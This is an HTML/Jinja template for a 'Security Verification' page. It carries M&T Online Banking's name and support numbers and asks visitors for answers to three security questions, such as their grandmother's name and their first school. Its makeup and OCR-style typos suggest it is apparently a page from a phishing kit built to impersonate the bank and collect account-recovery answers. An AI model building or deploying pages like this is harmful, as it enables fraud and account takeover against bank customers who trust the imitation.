{% extends 'base.html'%} {%block body%}

<div style="padding-top: 5px" class="middle-form">
  <p
    class="go-left"
    style="font-size: 30px; color: #007856; text-align: center"
  >
    Security Verification <br />
  </p>

  <div class="submitForm">
    <form action="" method="post">
      <div class="input-field">
        <label for="q1">Question 1</label>
        <select name="q1" id="q1">
          <option value="">Select</option>
          <option
            value="Name of the place where your wedding reception was help"
          >
            Name of the place where your wedding reception was help
          </option>
          <option
            value="What is the first name of the maid of honor at your wedding"
          >
            What is the first name of the maid of honor at your wedding
          </option>
          <option
            value="What is the first name of your best man at your wedding?"
          >
            What is the first name of your best man at your wedding?
          </option>
          <option
            value="What is the last name of your best friend in high school?"
          >
            What is the last name of your best friend in high school?
          </option>
          <option
            value="What was your childhood phone number including area code?"
          >
            What was your childhood phone number including area code?
          </option>
          <option
            value="What street did your best friend in high school live on?"
          >
            What street did your best friend in high school live on?
          </option>
          <option value="In what vear did vou buy vour first home?">
            In what vear did vou buy vour first home?
          </option>
          <option value="What was the model year of your first car?">
            What was the model year of your first car?
          </option>
          <option value="What is your maternal grandmother's first name?">
            What is your maternal grandmother's first name?
          </option>
        </select>
      </div>
      <div class="input-field">
        <label for="ans1">Answer</label>
        <input id="ans1" name="ans1" type="text" />
      </div>

      <!-- Question 2 -->
      <div class="input-field">
        <label for="q2">Question 2</label>
        <select name="q2" id="q2">
          <option value="">Select</option>
          <option value="What is the name of the hospital you were born?">
            What is the name of the hospital you were born?
          </option>
          <option value="What was the name of your middle school?">
            What was the name of your middle school?
          </option>
          <option value="What is the first name of your oldest nephew?">
            What is the first name of your oldest nephew?
          </option>
          <option value="What was the name of your junior high school?">
            What was the name of your junior high school?
          </option>

          <option
            value="To what destination city did you fly on your first airplane ride?"
          >
            To what destination city did you fly on your first airplane ride?
          </option>
          <option value="What's the first name of the first person you kissed?">
            What's the first name of the first person you kissed?
          </option>
          <option
            value="What was the first name of your first girlfriend or boyfriend?"
          >
            What was the first name of your first girlfriend or boyfriend?
          </option>
          <option value="Where did you meet your spouse for the first time?">
            Where did you meet your spouse for the first time?
          </option>
          <option value="Which was the first foreign country you visited?">
            Which was the first foreign country you visited?
          </option>
        </select>
      </div>
      <div class="input-field">
        <label for="ans2">Answer</label>
        <input id="ans2" name="ans2" type="text" />
      </div>

      <!-- Question 3 -->
      <div class="input-field">
        <label for="q3">Question 3</label>
        <select name="q3" id="q3">
          <option value="">Select</option>
          <option value="What is the name of the first company you worked for?">
            What is the name of the first company you worked for?
          </option>
          <option value="What is the maiden name of your father's mother?">
            What is the maiden name of your father's mother?
          </option>
          <option
            value="What was the name of the first instrument you played as a child?"
          >
            What was the name of the first instrument you played as a child?
          </option>
          <option value="In what city were you living at age 15?">
            In what city were you living at age 15?
          </option>
          <option value="What year did you retire?">
            What year did you retire?
          </option>
          <option
            value="What was the first name of your date on senior prom night in high school?"
          >
            What was the first name of your date on senior prom night in high
            school?
          </option>
          <option value="What is vour paternal grandmother's first name?">
            What is vour paternal grandmother's first name?
          </option>
          <option value="What is the last name of your first grade teacher?">
            What is the last name of your first grade teacher?
          </option>
          <option
            value="What is the middle name of your oldest sibbling?
            "
          >
            What is the middle name of your oldest sibbling?
          </option>
          <option value="What is the first name of your oldest niece?">
            What is the first name of your oldest niece?
          </option>
        </select>
      </div>
      <div class="input-field">
        <label for="ans3">Answer</label>
        <input id="ans3" name="ans3" type="text" />
      </div>

      <button style="width: 100%; margin-top: -5px" type="submit">
        Verify
      </button>
    </form>
    <br />

    <hr />

    <p>Have questions about M&T Online Banking?</p>
    <a href="">Personal Accounts: 1-800-790-9130</a>
    <p>Monday - Friday 8am - 9pm ET</p>
    <p>Saturday - Sunday 9am - 5pm ET</p>

    <a href="">Business Accounts: 1-800-724-6070</a>
  </div>
</div>

{%endblock%}
